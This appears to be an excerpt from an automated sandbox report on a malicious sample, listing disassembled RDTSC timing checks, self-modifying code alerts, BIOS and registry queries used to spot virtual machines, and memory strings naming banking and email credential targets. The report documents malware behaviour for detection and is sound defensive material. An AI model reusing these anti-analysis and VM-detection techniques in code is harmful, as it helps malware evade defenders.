            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536053C second address: 53605EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007FF9ACEA2293h 0x0000000b and eax, 64AEBC1Eh 0x00000011 jmp 00007FF9ACEA2299h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test ecx, ecx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FF9ACEA228Ch 0x00000023 and al, 00000018h 0x00000026 jmp 00007FF9ACEA228Bh 0x0000002b popfd 0x0000002c mov dh, cl 0x0000002e popad 0x0000002f jns 00007FF9ACEA22A4h 0x00000035 pushad 0x00000036 mov al, bh 0x00000038 movzx esi, bx 0x0000003b popad 0x0000003c add eax, ecx 0x0000003e jmp 00007FF9ACEA2295h 0x00000043 mov ecx, dword ptr [ebp+08h] 0x00000046 jmp 00007FF9ACEA228Eh 0x0000004b test ecx, ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF9ACEA2297h 0x00000054 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53605EA second address: 5360602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACE940A4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535024B second address: 5350250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350250 second address: 535028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF9ACE940A9h 0x00000011 adc ax, 7FC6h 0x00000016 jmp 00007FF9ACE940A1h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535028E second address: 5350293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350293 second address: 53502B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edi 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53502B7 second address: 5350305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007FF9ACEA2292h 0x0000000c xor esi, 7FE1C5F8h 0x00000012 jmp 00007FF9ACEA228Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d push edi 0x0000001e mov si, 497Dh 0x00000022 pop esi 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF9ACEA2292h 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350305 second address: 5350314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350362 second address: 5350368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350368 second address: 535036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535036C second address: 535038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF9ACEA2294h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535038C second address: 53503A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503A3 second address: 53503A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503A7 second address: 53503AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503AD second address: 53503FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a jmp 00007FF9ACEA2296h 0x0000000f test al, al 0x00000011 pushad 0x00000012 mov al, 71h 0x00000014 mov dh, 36h 0x00000016 popad 0x00000017 je 00007FF9ACEA2441h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF9ACEA2291h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503FC second address: 5350418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350418 second address: 5350461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, cx 0x00000007 popad 0x00000008 pushfd 0x00000009 jmp 00007FF9ACEA2294h 0x0000000e xor cx, 2288h 0x00000013 jmp 00007FF9ACEA228Bh 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [ebp-14h], edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF9ACEA2295h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504EB second address: 53504EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504EF second address: 53504F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504F5 second address: 53504FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504FB second address: 535058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FF9ACEA2290h 0x00000012 jg 00007FFA1D5B01E7h 0x00000018 jmp 00007FF9ACEA2290h 0x0000001d js 00007FF9ACEA22E3h 0x00000023 pushad 0x00000024 movzx esi, bx 0x00000027 movsx ebx, cx 0x0000002a popad 0x0000002b cmp dword ptr [ebp-14h], edi 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FF9ACEA2290h 0x00000035 adc ah, 00000058h 0x00000038 jmp 00007FF9ACEA228Bh 0x0000003d popfd 0x0000003e mov ebx, eax 0x00000040 popad 0x00000041 jne 00007FFA1D5B01ABh 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FF9ACEA228Ch 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535058C second address: 5350592 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350592 second address: 53505C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF9ACEA2297h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53505C0 second address: 53505E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53505E6 second address: 53505EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53505EC second address: 5350662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FF9ACE940A0h 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FF9ACE940A1h 0x00000016 jmp 00007FF9ACE940A0h 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d jmp 00007FF9ACE940A0h 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FF9ACE940A7h 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350757 second address: 535075D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535075D second address: 535079C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FF9ACE9409Eh 0x00000016 xor si, 66C8h 0x0000001b jmp 00007FF9ACE9409Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535079C second address: 535002C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF9ACEA228Fh 0x00000008 jmp 00007FF9ACEA2298h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FFA1D5B0112h 0x00000016 xor eax, eax 0x00000018 jmp 00007FF9ACE7B9BAh 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 mov esi, eax 0x0000002a cmp esi, 00000000h 0x0000002d setne al 0x00000030 xor ebx, ebx 0x00000032 test al, 01h 0x00000034 jne 00007FF9ACEA2287h 0x00000036 jmp 00007FF9ACEA238Fh 0x0000003b call 00007FF9B160DCA5h 0x00000040 mov edi, edi 0x00000042 jmp 00007FF9ACEA2293h 0x00000047 xchg eax, ebp 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b call 00007FF9ACEA2292h 0x00000050 pop esi 0x00000051 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535002C second address: 535008F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF9ACE9409Bh 0x00000008 and si, 784Eh 0x0000000d jmp 00007FF9ACE940A9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF9ACE940A0h 0x0000001b xor ecx, 586374C8h 0x00000021 jmp 00007FF9ACE9409Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FF9ACE9409Bh 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535008F second address: 5350093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350093 second address: 5350099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350099 second address: 53500EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF9ACEA2290h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FF9ACEA2290h 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF9ACEA2297h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350D0B second address: 5350D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FFA1D591D76h 0x0000000f pushad 0x00000010 push esi 0x00000011 push edi 0x00000012 pop eax 0x00000013 pop ebx 0x00000014 pushfd 0x00000015 jmp 00007FF9ACE940A6h 0x0000001a sbb eax, 173BCC38h 0x00000020 jmp 00007FF9ACE9409Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF9ACE940A5h 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350D6C second address: 5350D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350D72 second address: 5350D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350DDD second address: 5350E72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF9ACEA228Fh 0x00000009 adc cx, 3A1Eh 0x0000000e jmp 00007FF9ACEA2299h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF9ACEA2290h 0x0000001a sub si, 9018h 0x0000001f jmp 00007FF9ACEA228Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push 1551FA81h 0x0000002d pushad 0x0000002e mov dl, 2Fh 0x00000030 call 00007FF9ACEA228Eh 0x00000035 jmp 00007FF9ACEA2292h 0x0000003a pop ecx 0x0000003b popad 0x0000003c xor dword ptr [esp], 60FB66A9h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov ecx, 3B5FCAF9h 0x0000004b mov ax, 1DB5h 0x0000004f popad 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350E72 second address: 5350E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350E78 second address: 5350E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350E7C second address: 5350EA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FFA1D598D84h 0x0000000d push 75A52B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AB4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 movzx esi, bx 0x00000058 jmp 00007FF9ACE940A7h 0x0000005d popad 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350EA7 second address: 5350EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350F6B second address: 5350FD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF9ACE940A1h 0x0000000c and eax, 1B8DCCB6h 0x00000012 jmp 00007FF9ACE940A1h 0x00000017 popfd 0x00000018 popad 0x00000019 je 00007FFA1D587A7Fh 0x0000001f jmp 00007FF9ACE9409Eh 0x00000024 cmp dword ptr [ebp+08h], 00002000h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FF9ACE940A7h 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350FD0 second address: 5350FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACEA2294h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5350FE8 second address: 5350FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53609FF second address: 5360A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360A10 second address: 5360A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360A16 second address: 5360A3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop ecx 0x00000011 mov bx, 6032h 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360A3A second address: 5360A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 pushfd 0x00000006 jmp 00007FF9ACE940A2h 0x0000000b add ch, 00000048h 0x0000000e jmp 00007FF9ACE9409Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c pop edi 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360A6D second address: 5360A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360A73 second address: 5360A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360A77 second address: 5360A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007FF9ACEA2297h 0x0000000f push eax 0x00000010 push edx 0x00000011 mov dx, cx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360A9D second address: 5360AFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FF9ACE9409Ch 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF9ACE9409Dh 0x00000018 and si, 3526h 0x0000001d jmp 00007FF9ACE940A1h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FF9ACE940A0h 0x00000029 sub ax, 96C8h 0x0000002e jmp 00007FF9ACE9409Bh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360AFE second address: 5360B24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF9ACEA2298h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360B24 second address: 5360B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF9ACE940A1h 0x00000009 or cx, E146h 0x0000000e jmp 00007FF9ACE940A1h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF9ACE940A9h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360B71 second address: 5360B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360B76 second address: 5360B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360B7C second address: 5360BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+0Ch] 0x0000000a jmp 00007FF9ACEA2299h 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FF9ACEA2293h 0x0000001a adc cx, 933Eh 0x0000001f jmp 00007FF9ACEA2299h 0x00000024 popfd 0x00000025 jmp 00007FF9ACEA2290h 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360BE8 second address: 5360BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360BEE second address: 5360BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360CDA second address: 5360CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 mov dx, ax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360CE4 second address: 5360CFC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1EFB2D45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c call 00007FF9ACEA228Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DBA9AB instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DBA5C3 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: C0CA79 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: E47FDF instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\file.exe TID: 7632 | Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 7724 | Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, file.exe, 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: file.exe, 00000000.00000002.1498844199.00000000014F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: file.exe, 00000000.00000003.1368377137.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
